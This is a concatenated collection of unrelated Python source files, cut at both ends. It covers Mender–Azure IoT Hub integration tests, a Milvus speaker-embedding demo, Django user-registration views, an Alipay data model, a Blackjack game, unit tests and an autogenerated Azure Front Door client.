"desired": {"key": "value"},
"reported": {"another-key": "another-value"},
},
"tags": {"tag-key": "tag-value"},
"capabilities": {"iotEdge": False},
"connectionState": "Disconnected",
}
def _prepare_device(
self,
azure_user: User,
httpserver: HTTPServer,
httpserver_ssl_context: ssl.SSLContext,
) -> Device:
"""Create accepted device in Mender and make sure it has been successfully added in Azure IoT Hub."""
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="PUT",
query_string="api-version=2021-04-12",
).respond_with_json(self._prepare_iot_hub_upsert_device_response())
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_data(status=200)
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="PUT",
query_string="api-version=2021-04-12",
).respond_with_data(status=200)
httpserver.expect_oneshot_request(
re.compile("^/twins"),
method="PATCH",
query_string="api-version=2021-04-12",
).respond_with_data(status=200)
tenant_token = getattr(getattr(azure_user, "tenant", {}), "tenant_token", "")
dev = make_accepted_device(
self.api_devauth_devices,
self.api_devauth_mgmt,
azure_user.token,
tenant_token=tenant_token,
test_type="azure",
)
self.devices.append(dev.id)
for _ in retrier(attempts=5, sleeptime=1):
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/twins"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_json(self._prepare_iot_hub_upsert_device_response())
rsp = self.api_azure.with_auth(azure_user.token).call(
"GET", iot.URL_DEVICE(dev.id)
)
if rsp.status_code == 200:
break
return dev
@retriable(sleeptime=1, attempts=5)
def _check_deviceconfig(self, azure_user: User, device_id: str):
"""Check if Azure IoT Hub primary and secondary keys have been added to deviceconfig database."""
rsp = self.api_deviceconfig.with_auth(azure_user.token).call(
"GET", deviceconfig.URL_MGMT_DEVICE_CONFIGURATION.format(id=device_id)
)
assert rsp.status_code == 200
conf = rsp.json().get("configured")
assert len(conf) > 0
assert "azureConnectionString" in conf
@retriable(sleeptime=2, attempts=5)
def _check_if_device_status_is_set_to_value(
self, azure_user: User, httpserver: HTTPServer, device_id: str, status: str
):
"""Check if device status in IoT Hub is set to the desired value."""
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_json(
self._prepare_iot_hub_upsert_device_response(status=status)
)
# device exists in iot-manager
rsp = self.api_azure.with_auth(azure_user.token).call(
"GET", iot.URL_DEVICE_STATE(device_id)
)
assert rsp.status_code == 200
# check the status of the device in IoT Hub
device = get_azure_client().get_device(device_id)
assert device.status == status
@pytest.mark.parametrize("status", ["rejected", "noauth"])
def test_device_accept_and_reject_or_dismiss(
self,
status,
azure_user: User,
httpserver: HTTPServer,
httpserver_ssl_context: ssl.SSLContext,
):
"""Test how accepted-rejected and accepted-dismissed Mender flow affects Azure IoT Hub devices."""
dev = self._prepare_device(azure_user, httpserver, httpserver_ssl_context)
@retriable(sleeptime=1, attempts=5)
def set_device_status_in_mender(desired_status: str):
"""Set device status in Mender."""
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_json(self._prepare_iot_hub_upsert_device_response())
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="PUT",
query_string="api-version=2021-04-12",
).respond_with_json(
self._prepare_iot_hub_upsert_device_response(status="disabled")
)
authset_id = dev.authsets[0].id
if status == "noauth":
rsp = self.api_devauth_mgmt.with_auth(azure_user.token).call(
"DELETE",
deviceauth.URL_AUTHSET,
path_params={"did": dev.id, "aid": authset_id},
)
else:
rsp = self.api_devauth_mgmt.with_auth(azure_user.token).call(
"PUT",
deviceauth.URL_AUTHSET_STATUS,
deviceauth.req_status(desired_status),
path_params={"did": dev.id, "aid": authset_id},
)
assert rsp.status_code == 204
self._check_deviceconfig(azure_user, dev.id)
self._check_if_device_status_is_set_to_value(
azure_user, httpserver, dev.id, "enabled"
)
#
set_device_status_in_mender(status)
self._check_if_device_status_is_set_to_value(
azure_user, httpserver, dev.id, "disabled"
)
    def test_device_provision_and_decommission(
self,
azure_user: User,
httpserver: HTTPServer,
httpserver_ssl_context: ssl.SSLContext,
):
"""Test how accepted-decommissioned Mender flow affects Azure IoT Hub devices."""
dev = self._prepare_device(azure_user, httpserver, httpserver_ssl_context)
@retriable(sleeptime=2, attempts=5)
def decommission_device():
"""Decommission the device in Mender, which in turn removes the device from IoT Hub."""
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="DELETE",
query_string="api-version=2021-04-12",
).respond_with_data(status=200)
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_data(status=404)
rsp = self.api_devauth_mgmt.with_auth(azure_user.token).call(
"DELETE", deviceauth.URL_DEVICE.format(id=dev.id),
)
assert rsp.status_code == 204
@retriable(sleeptime=2, attempts=5)
def check_if_device_was_removed_from_azure():
"""Check if device was remove from Azure IoT HUb using azure-iot-manager service proxy."""
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_data(status=404)
rsp = self.api_azure.with_auth(azure_user.token).call(
"GET", iot.URL_DEVICE_STATE(dev.id)
)
assert rsp.status_code == 404
self.devices.remove(dev.id)
self._check_deviceconfig(azure_user, dev.id)
self._check_if_device_status_is_set_to_value(
azure_user, httpserver, dev.id, "enabled"
)
#
decommission_device()
check_if_device_was_removed_from_azure()
def test_device_twin(
self,
azure_user: User,
httpserver: HTTPServer,
httpserver_ssl_context: ssl.SSLContext,
):
"""Test device state synchronization with IoT Hub Device Twin"""
dev = self._prepare_device(azure_user, httpserver, httpserver_ssl_context)
self._check_if_device_status_is_set_to_value(
azure_user, httpserver, dev.id, "enabled"
)
# get the all device states (device twins)
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/devices"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_json(self._prepare_iot_hub_upsert_device_response())
rsp = self.api_azure.with_auth(azure_user.token).call(
"GET", iot.URL_DEVICE_STATE(dev.id)
)
assert rsp.status_code == 200
states = rsp.json()
assert len(states.keys()) == 1
integration_id = list(states.keys())[0]
assert "desired" in states[integration_id]
assert "reported" in states[integration_id]
# set the device state (device twin)
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/twins"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_json(self._prepare_iot_hub_upsert_device_response())
httpserver.expect_oneshot_request(
re.compile("^/twins"),
method="PUT",
query_string="api-version=2021-04-12",
).respond_with_data(status=200)
twin = {
"desired": {"key": "value"},
}
rsp = (
self.api_azure.with_auth(azure_user.token)
.with_header("Content-Type", "application/json")
.call("PUT", iot.URL_DEVICE_STATE(dev.id) + "/" + integration_id, twin)
)
assert rsp.status_code == 200
state = rsp.json()
assert "desired" in state
assert "reported" in states[integration_id]
assert state["desired"]["key"] == "value"
# get the device state (device twin)
if self.azure_iot_hub_mock:
httpserver.expect_oneshot_request(
re.compile("^/twins"),
method="GET",
query_string="api-version=2021-04-12",
).respond_with_json(self._prepare_iot_hub_upsert_device_response())
rsp = self.api_azure.with_auth(azure_user.token).call(
"GET", iot.URL_DEVICE_STATE(dev.id) + "/" + integration_id
)
assert rsp.status_code == 200
state = rsp.json()
assert "desired" in state
assert "reported" in states[integration_id]
assert state["desired"]["key"] == "value"
class TestAzureDeviceLifecycle(_TestAzureDeviceLifecycleBase):
pass
class TestAzureDeviceLifecycleEnterprise(_TestAzureDeviceLifecycleBase):
pass
|
import abc
class ProviderInterfaceV0(object):
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
    def sensor_products(self, product_id):
"""Returns list of all available products for a given scene id"""
return
@abc.abstractmethod
def available_products(self, product_id, username):
"""Returns list of products available for a give user"""
return
@abc.abstractmethod
def fetch_user_orders(self, uid):
"""Returns list of orders for a given user"""
return
@abc.abstractmethod
def check_open_scenes(self, uid):
"""Returns list of open scenes for a given user"""
return
@abc.abstractmethod
def fetch_order(self, ordernum):
"""Returns details for a given order"""
return
@abc.abstractmethod
def place_order(self, username, order):
"""Method for placing a processing order"""
return
@abc.abstractmethod
def cancel_order(self, orderid, request_ip_address):
"""Kill an order in progress"""
return
@abc.abstractmethod
def item_status(self, orderid, itemid):
"""Return order item processing status"""
return
class MockOrderingProvider(object):
__metaclass__ = abc.ABCMeta
def place_order(self, username):
pass
def list_orders(self, username_or_email):
pass
def view_order(self, orderid):
pass
def item_status(self, orderid, itemid='ALL'):
"""
:rtype: str
"""
pass
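# A minimal sketch (not part of the original module) of a concrete provider that
# satisfies ProviderInterfaceV0; the in-memory storage and return values below are
# illustrative assumptions rather than a real ordering backend.
class InMemoryOrderingProvider(ProviderInterfaceV0):
    def __init__(self):
        self._orders = {}  # maps order number -> order payload

    def sensor_products(self, product_id):
        return []

    def available_products(self, product_id, username):
        return []

    def fetch_user_orders(self, uid):
        return [num for num, order in self._orders.items() if order.get('uid') == uid]

    def check_open_scenes(self, uid):
        return []

    def fetch_order(self, ordernum):
        return self._orders.get(ordernum)

    def place_order(self, username, order):
        ordernum = 'order-%d' % (len(self._orders) + 1)
        self._orders[ordernum] = dict(order, uid=username)
        return ordernum

    def cancel_order(self, orderid, request_ip_address):
        return self._orders.pop(orderid, None) is not None

    def item_status(self, orderid, itemid):
        return 'complete' if orderid in self._orders else 'unknown'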
|
from csv import DictReader
# Read a CSV file that uses a non-default delimiter
with open('fighters_with_pipe.csv') as file:
csv_dict_reader = DictReader(file,delimiter='|')
for row in csv_dict_reader:
print(row) |
import numpy as np
import random
import os
import sys
from audio import read_mfcc
from batcher import sample_from_mfcc
from constants import SAMPLE_RATE, NUM_FRAMES
from conv_models import DeepSpeakerModel
from test import batch_cosine_similarity
import time
from milvus import Milvus, IndexType, MetricType, Status
from milvus.client.abstract import TopKQueryResult
np.random.seed(123)
random.seed(123)
file_path = 'samples/PhilippeRemy'
model = DeepSpeakerModel()
model.m.load_weights('checkpoints/ResCNN_triplet_training_checkpoint_265.h5', by_name=True)
_HOST = '192.168.1.85'
_PORT = '19530' # default value
_DIM = 512 # dimension of vector
_INDEX_FILE_SIZE = 32 # max file size of stored index
collection_name = 'example_speaker'
milvus = Milvus()
def voc_to_vec(file):
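    """Turn one speech sample into a 512-dimensional speaker embedding.

    The MFCC features are sampled to NUM_FRAMES frames and pushed through the
    pretrained Deep Speaker model; the resulting vector is what gets stored and
    searched in Milvus below.
    """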
mfcc = sample_from_mfcc(read_mfcc(file, SAMPLE_RATE), NUM_FRAMES)
predict = model.m.predict(np.expand_dims(mfcc, axis=0))
vec = list(map(float,predict.tolist()[0]))
return vec
def load_voc(file_path):
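    """Embed every audio file under ``file_path``.

    The first four characters of each file name are assumed to encode the integer
    id used as the Milvus primary key for that sample.
    """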
filenames = os.listdir(file_path)
filenames.sort()
vectors = []
ids = []
for filename in filenames:
vectors.append(voc_to_vec(file_path + '/' + filename))
ids.append(int(filename[0:4]))
return vectors,ids
def connect_milvus_server():
# print("connect to milvus")
status = milvus.connect(host=_HOST, port=_PORT, timeout=1000 * 1000 * 20)
print(status)
return status
def create_milvus_collection():
status, ok = milvus.has_collection(collection_name)
print(status,ok)
if not ok:
param = {
'collection_name': collection_name,
'dimension': _DIM,
'index_file_size': _INDEX_FILE_SIZE, # optional
'metric_type': MetricType.IP # optional
}
milvus.create_collection(param)
def search_in_milvus(query_vectors):
param = {
'collection_name': collection_name,
'query_records': query_vectors,
'top_k': 5,
'params': {"nprobe": 16},
}
status, results = milvus.search(**param)
for re in results:
print('\n')
for i in re:
print(i)
def insert_vec(vectors, ids):
create_milvus_collection()
# Insert vectors into demo_collection, return status and vectors id list
status, ids = milvus.insert(collection_name=collection_name, records=vectors, ids=ids)
print(status,ids)
milvus.flush([collection_name])
def main():
connect_milvus_server()
vectors, ids = load_voc(file_path)
insert_vec(vectors, ids)
query_vectors=[]
query_vectors.append(vectors[0])
query_vectors.append(vectors[4])
query_vectors.append(vectors[8])
    search_in_milvus(query_vectors)
if __name__ == "__main__":
main()
|
import json
#import requests
from django.http import HttpResponse, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from django.db import connection
from django.contrib.gis.geos import Point
from public.models import User, Address, City, CenterOfInterest, InterestFor, District
from public import modify_address
from public import data_insert as di
@csrf_exempt
def city_exist(payload):
"""recherche de la city ajoute dans la bd"""
city_name = payload.get('city_name')
if not City.objects.filter(city_name=city_name).exists():
city = City(city_name=city_name).save()
city = City.objects.get(city_name=city_name)
else:
city = City.objects.get(city_name=city_name)
return(city.id)
@csrf_exempt
def district_exist(payload):
"""recherche le quartier"""
name_district = payload.get('districts')
if not District.objects.filter(id=1).exists():
city = City(city_name='Toulouse').save()
city = City.objects.get(city_name='Toulouse')
di.insert_district(di.read_json('./Data/district.json'), city.id)
elif name_district is None:
return (District.objects.get(district_name='NULL').id)
else:
return(District.objects.get(district_name=name_district).id)
@csrf_exempt
def address_exist(payload):
"""cherche si l'adresse existe dans la bd si oui renvoi l'id sinon la creee"""
a_number = payload.get('street_number', None)
a_name = payload.get('street_name', None)
a_cp = payload.get('postcode', None)
    if a_number is None or a_name is None or a_cp is None:
        print("no address provided")
return(None)
a_complement = payload.get('complement', None)
a_district = district_exist(payload)
a_ville = city_exist(payload)
#print(a_number, a_name, a_cp, a_ville)
#print(modify_address.geocoder(('2','chemin des sauges','31400','TOULOUSE')))
if not Address.objects.filter(street_number=a_number, street_name=a_name, postal_code=a_cp, complement=a_complement).exists():
new_address = Address(
street_number=a_number,
street_name=a_name,
postal_code=a_cp,
address_city_id=a_ville,
district_id=a_district,
location=Point(modify_address.geocoder((a_number, a_name, a_cp, a_ville)))
)
address = new_address.save()
address = Address.objects.get(street_number=a_number, street_name=a_name, postal_code=a_cp, complement=a_complement)
else:
address = Address.objects.get(street_number=a_number, street_name=a_name, postal_code=a_cp, complement=a_complement)
return(address.id)
@csrf_exempt
def test_email(payload):
"""verifie email unique"""
email = payload.get('email')
if not User.objects.filter(email=email).exists():
return email
else:
return HttpResponse(status=400)
@csrf_exempt
def CenterOfInterest_exist(CenterInterest):
"""verifie centre interet existe"""
if not CenterOfInterest.objects.filter(id=1).exists():
di.insert_centerofinterest(di.read_json('./Data/centerInterest.json'))
return(CenterOfInterest.objects.get(name_center_of_interest=CenterInterest).id)
else:
print(CenterOfInterest.objects.get(name_center_of_interest=CenterInterest))
return(CenterOfInterest.objects.get(name_center_of_interest=CenterInterest).id)
@csrf_exempt
def gender_exist(payload):
name_gender = payload.get('gender')
if name_gender is None:
return (None)
else:
g = {'Homme': 'M', 'Femme': 'F'}
return g[name_gender]
@csrf_exempt
def csp_exist(payload):
"""renvoi la csp du user"""
name_csp = payload.get('social_professional_category')
if name_csp is None:
return (None)
else:
csp = {'artisans, commercants, chefs entreprise': '1',
'cadres et professions intellectuelles superieures': '2',
'professions intermediaires': '3',
'employes': '4',
'ouvriers': '5',
'retraites': '6',
'chomeurs': '7',
'etudiants': '8',
'autres': '9'
}
return csp[name_csp]
@csrf_exempt
def car_size_exist(payload):
"""renvoi la categorie de la voiture"""
name_car_size = payload.get('car_size')
if name_car_size is None:
return (None)
else:
size = {'petite voiture': '1',
'moyenne voiture': '2',
'grande voiture': '3'
}
return size[name_car_size]
@csrf_exempt
def post_user(request):
#try:
data = json.loads(request.body.decode())
for i in range(0, len(data)):
payload = data[i]
print(payload)
if User.objects.filter(email=payload['email']).exists():
return HttpResponse(status=400)
new_user = User(
email=test_email(payload),
first_name=payload.get('first_name'),
last_name=payload.get('last_name'),
user_img=payload.get('user_img', None),
is_active=payload.get('is_active', True),
is_staff=payload.get('is_staff', False),
user_permission=payload.get('user_permission', 0),
            date_birth=payload.get('date_birth', None),
social_professional_category=csp_exist(payload),
gender=gender_exist(payload),
phone_number=payload.get('phone_number', None),
car_size=car_size_exist(payload),
home_address_id=address_exist(payload)
)
new_user.set_password(payload.get('password'))
new_user.save()
if payload.get('name_center_of_interest'):
for CenterOfInterest in payload.get('name_center_of_interest'):
new_InterestFor = InterestFor(
user_id=User.objects.get(email=payload['email']).id,
center_of_interest_id=CenterOfInterest_exist(CenterOfInterest)
)
new_InterestFor.save()
return HttpResponse(status=201)
# except:
# return HttpResponse(status=400)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipaySecurityRiskCustomerriskSendModel(object):
def __init__(self):
self._bank_card_no = None
self._business_license_no = None
self._cert_no = None
self._email_address = None
self._external_id = None
self._merch_name = None
self._mobile = None
self._mobile_ip = None
self._order_ip = None
self._pid = None
self._plat_account = None
self._process_code = None
self._smid = None
self._trade_no = None
@property
def bank_card_no(self):
return self._bank_card_no
@bank_card_no.setter
def bank_card_no(self, value):
self._bank_card_no = value
@property
def business_license_no(self):
return self._business_license_no
@business_license_no.setter
def business_license_no(self, value):
self._business_license_no = value
@property
def cert_no(self):
return self._cert_no
@cert_no.setter
def cert_no(self, value):
self._cert_no = value
@property
def email_address(self):
return self._email_address
@email_address.setter
def email_address(self, value):
self._email_address = value
@property
def external_id(self):
return self._external_id
@external_id.setter
def external_id(self, value):
self._external_id = value
@property
def merch_name(self):
return self._merch_name
@merch_name.setter
def merch_name(self, value):
self._merch_name = value
@property
def mobile(self):
return self._mobile
@mobile.setter
def mobile(self, value):
self._mobile = value
@property
def mobile_ip(self):
return self._mobile_ip
@mobile_ip.setter
def mobile_ip(self, value):
self._mobile_ip = value
@property
def order_ip(self):
return self._order_ip
@order_ip.setter
def order_ip(self, value):
self._order_ip = value
@property
def pid(self):
return self._pid
@pid.setter
def pid(self, value):
self._pid = value
@property
def plat_account(self):
return self._plat_account
@plat_account.setter
def plat_account(self, value):
self._plat_account = value
@property
def process_code(self):
return self._process_code
@process_code.setter
def process_code(self, value):
self._process_code = value
@property
def smid(self):
return self._smid
@smid.setter
def smid(self, value):
self._smid = value
@property
def trade_no(self):
return self._trade_no
@trade_no.setter
def trade_no(self, value):
self._trade_no = value
def to_alipay_dict(self):
params = dict()
if self.bank_card_no:
if hasattr(self.bank_card_no, 'to_alipay_dict'):
params['bank_card_no'] = self.bank_card_no.to_alipay_dict()
else:
params['bank_card_no'] = self.bank_card_no
if self.business_license_no:
if hasattr(self.business_license_no, 'to_alipay_dict'):
params['business_license_no'] = self.business_license_no.to_alipay_dict()
else:
params['business_license_no'] = self.business_license_no
if self.cert_no:
if hasattr(self.cert_no, 'to_alipay_dict'):
params['cert_no'] = self.cert_no.to_alipay_dict()
else:
params['cert_no'] = self.cert_no
if self.email_address:
if hasattr(self.email_address, 'to_alipay_dict'):
params['email_address'] = self.email_address.to_alipay_dict()
else:
params['email_address'] = self.email_address
if self.external_id:
if hasattr(self.external_id, 'to_alipay_dict'):
params['external_id'] = self.external_id.to_alipay_dict()
else:
params['external_id'] = self.external_id
if self.merch_name:
if hasattr(self.merch_name, 'to_alipay_dict'):
params['merch_name'] = self.merch_name.to_alipay_dict()
else:
params['merch_name'] = self.merch_name
if self.mobile:
if hasattr(self.mobile, 'to_alipay_dict'):
params['mobile'] = self.mobile.to_alipay_dict()
else:
params['mobile'] = self.mobile
if self.mobile_ip:
if hasattr(self.mobile_ip, 'to_alipay_dict'):
params['mobile_ip'] = self.mobile_ip.to_alipay_dict()
else:
params['mobile_ip'] = self.mobile_ip
if self.order_ip:
if hasattr(self.order_ip, 'to_alipay_dict'):
params['order_ip'] = self.order_ip.to_alipay_dict()
else:
params['order_ip'] = self.order_ip
if self.pid:
if hasattr(self.pid, 'to_alipay_dict'):
params['pid'] = self.pid.to_alipay_dict()
else:
params['pid'] = self.pid
if self.plat_account:
if hasattr(self.plat_account, 'to_alipay_dict'):
params['plat_account'] = self.plat_account.to_alipay_dict()
else:
params['plat_account'] = self.plat_account
if self.process_code:
if hasattr(self.process_code, 'to_alipay_dict'):
params['process_code'] = self.process_code.to_alipay_dict()
else:
params['process_code'] = self.process_code
if self.smid:
if hasattr(self.smid, 'to_alipay_dict'):
params['smid'] = self.smid.to_alipay_dict()
else:
params['smid'] = self.smid
if self.trade_no:
if hasattr(self.trade_no, 'to_alipay_dict'):
params['trade_no'] = self.trade_no.to_alipay_dict()
else:
params['trade_no'] = self.trade_no
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipaySecurityRiskCustomerriskSendModel()
if 'bank_card_no' in d:
o.bank_card_no = d['bank_card_no']
if 'business_license_no' in d:
o.business_license_no = d['business_license_no']
if 'cert_no' in d:
o.cert_no = d['cert_no']
if 'email_address' in d:
o.email_address = d['email_address']
if 'external_id' in d:
o.external_id = d['external_id']
if 'merch_name' in d:
o.merch_name = d['merch_name']
if 'mobile' in d:
o.mobile = d['mobile']
if 'mobile_ip' in d:
o.mobile_ip = d['mobile_ip']
if 'order_ip' in d:
o.order_ip = d['order_ip']
if 'pid' in d:
o.pid = d['pid']
if 'plat_account' in d:
o.plat_account = d['plat_account']
if 'process_code' in d:
o.process_code = d['process_code']
if 'smid' in d:
o.smid = d['smid']
if 'trade_no' in d:
o.trade_no = d['trade_no']
return o
|
from GLOBAL_VAR import *
group = 0
pair_Fn = '%s/%s_outlierPairs_group%d.txt' % (pairdir, LMfn, group)
N0 = len(pd.read_csv(pair_Fn, header= None, sep='\t', usecols=[0]))
pairs_N = []
for group in range(1, 23):
pair_Fn = '%s/%s_outlierPairs_group%d.txt' % (pairdir, LMfn, group)
N = len(pd.read_csv(pair_Fn, header= None, sep='\t', usecols=[0]))
pairs_N.append([N, N0])
pairs_N = pd.DataFrame(pairs_N)
pairs_N.columns = ['ts_N', 'shared_N']
pairs_N.to_csv('Fig2_sig_prop_%s.txt' % FMfn, sep='\t', index = False)
|
from weldx.asdf.types import WeldxType
from weldx.measurement import Source
__all__ = ["Source", "SourceType"]
class SourceType(WeldxType):
"""Serialization class for measurement sources."""
name = "measurement/source"
version = "1.0.0"
types = [Source]
requires = ["weldx"]
handle_dynamic_subclasses = True
@classmethod
def to_tree(cls, node: Source, ctx):
"""convert to tagged tree and remove all None entries from node dictionary"""
tree = node.__dict__
return tree
@classmethod
def from_tree(cls, tree, ctx):
obj = Source(**tree)
return obj
|
'''defines the Blackjack class'''
from .player import Player
from .deck import Deck
from .input_handling import match_yes, next_player, press_return
class Blackjack():
'''the class that keeps track of gameplay
kw args:
num_players -- the number of players, an integer between 2 and 4
names -- an array of player names
instance variables:
deck -- a Deck object
players -- a list of Player objects
methods:
'''
def __init__(self, num_players, names=[]):
'''initializes the Blackjack class
kw args:
num_players -- the number of players, an integer between 2 and 4
names -- an array of player names
instance variables:
deck -- a Deck object
players -- a list of Player objects
'''
self.deck = Deck()
self.players = []
# record player names
for player in range(num_players):
if names:
self.players.append(Player(self.deck, \
names[player]))
else:
self.players.append(Player(self.deck, \
input("What's your name, player {}?\n".format(player + 1))))
def unbroken(self):
'''
returns a list of players who are 'unbroken' (i.e. the sum
of their hand is below 22)
'''
return list(filter(lambda player: player.sum_hand() <= 21, self.players))
def start_round(self):
'''starts a round of Blackjack'''
# print each player's hand
for player in self.players:
next_player(player)
player.print_hand()
press_return()
# move to next turn
self.next_turn()
def next_turn(self):
'''runs the next turn of blackjack game'''
# iterate through players
for player in self.players:
if player.cont and len(self.unbroken()) > 1:
next_player(player)
player.print_hand()
# queries the player
if match_yes("Would you like to draw another card, {}?"
.format(player.name)):
player.draw()
player.print_hand()
# checks if player is "broken"
if player.sum_hand() > 21:
print("You're out!")
player.cont = False
else:
player.cont = False
press_return()
# checks if another turn is necessary
if (any(map(lambda player: player.cont, self.players)) and len(self.unbroken()) > 1):
self.next_turn()
# ends game
else:
self.end()
def end(self):
'''finishes the blackjack game'''
# find the winner
winner = max(self.unbroken(), key = lambda player: player.sum_hand())
# print congratulations
print("Congratulations, {}! With a score of {}, you've won!"
.format(winner.name, winner.sum_hand()))
# queries the user if they would like to play again
if match_yes("Would you like to play again?"):
game = Blackjack(
len(self.players),
names = list(map(lambda player: player.name, self.players)))
game.start_round()
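# A minimal usage sketch, assuming the module is run as part of its package so the
# relative imports above resolve; the player names are illustrative.
if __name__ == '__main__':
    table = Blackjack(2, names=['Alice', 'Bob'])
    table.start_round()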
|
import unittest
from PIL import Image
import mock
from spriter.image import URLImage
from tests import Openned
class TestImage(unittest.TestCase):
def test_simple_url_get_base(self):
with mock.patch("urllib.urlopen") as mck:
mck.return_value = Openned("http://pitomba.org/happy.png")
img = URLImage("http://pitomba.org/happy.png")
img_pil = Image.open("tests/fixtures/happy.png")
            self.assertEqual(img_pil.histogram(), img.raw.histogram())
def test_simple_url_get_base_with_default(self):
with mock.patch("urllib.urlopen") as mck:
mck.return_value = Openned("http://pitomba.org/happy.png")
mck.return_value.code = 404
img = URLImage("404", default_url="http://pitomba.org/happy.png")
img_pil = Image.open("tests/fixtures/happy.png")
            self.assertEqual(img_pil.histogram(), img.raw.histogram())
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from .. import models
class ReportsOperations(object):
"""ReportsOperations operations.
    You should not instantiate this class directly; create a Client instance instead, which will create it for you and attach it as an attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API version. Constant value: "2019-11-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2019-11-01"
self.config = config
def get_latency_scorecards(
self, resource_group_name, profile_name, experiment_name, aggregation_interval, end_date_time_utc=None, country=None, custom_headers=None, raw=False, **operation_config):
"""Gets a Latency Scorecard for a given Experiment.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant
and Partner
:type profile_name: str
:param experiment_name: The Experiment identifier associated with the
Experiment
:type experiment_name: str
:param aggregation_interval: The aggregation interval of the Latency
Scorecard. Possible values include: 'Daily', 'Weekly', 'Monthly'
:type aggregation_interval: str or
~azure.mgmt.frontdoor.models.LatencyScorecardAggregationInterval
:param end_date_time_utc: The end DateTime of the Latency Scorecard in
UTC
:type end_date_time_utc: str
:param country: The country associated with the Latency Scorecard.
Values are country ISO codes as specified here-
https://www.iso.org/iso-3166-country-codes.html
:type country: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: LatencyScorecard or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.frontdoor.models.LatencyScorecard or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.frontdoor.models.ErrorResponseException>`
"""
# Construct URL
url = self.get_latency_scorecards.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=80, min_length=1, pattern=r'^[a-zA-Z0-9_\-\(\)\.]*[^\.]$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str', pattern=r'^[a-zA-Z0-9_\-\(\)\.]*[^\.]$'),
'experimentName': self._serialize.url("experiment_name", experiment_name, 'str', pattern=r'^[a-zA-Z0-9_\-\(\)\.]*[^\.]$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if end_date_time_utc is not None:
query_parameters['endDateTimeUTC'] = self._serialize.query("end_date_time_utc", end_date_time_utc, 'str')
if country is not None:
query_parameters['country'] = self._serialize.query("country", country, 'str')
query_parameters['aggregationInterval'] = self._serialize.query("aggregation_interval", aggregation_interval, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('LatencyScorecard', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_latency_scorecards.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}/LatencyScorecard'}
def get_timeseries(
self, resource_group_name, profile_name, experiment_name, start_date_time_utc, end_date_time_utc, aggregation_interval, timeseries_type, endpoint=None, country=None, custom_headers=None, raw=False, **operation_config):
"""Gets a Timeseries for a given Experiment.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant
and Partner
:type profile_name: str
:param experiment_name: The Experiment identifier associated with the
Experiment
:type experiment_name: str
:param start_date_time_utc: The start DateTime of the Timeseries in
UTC
:type start_date_time_utc: datetime
:param end_date_time_utc: The end DateTime of the Timeseries in UTC
:type end_date_time_utc: datetime
:param aggregation_interval: The aggregation interval of the
Timeseries. Possible values include: 'Hourly', 'Daily'
:type aggregation_interval: str or
~azure.mgmt.frontdoor.models.TimeseriesAggregationInterval
:param timeseries_type: The type of Timeseries. Possible values
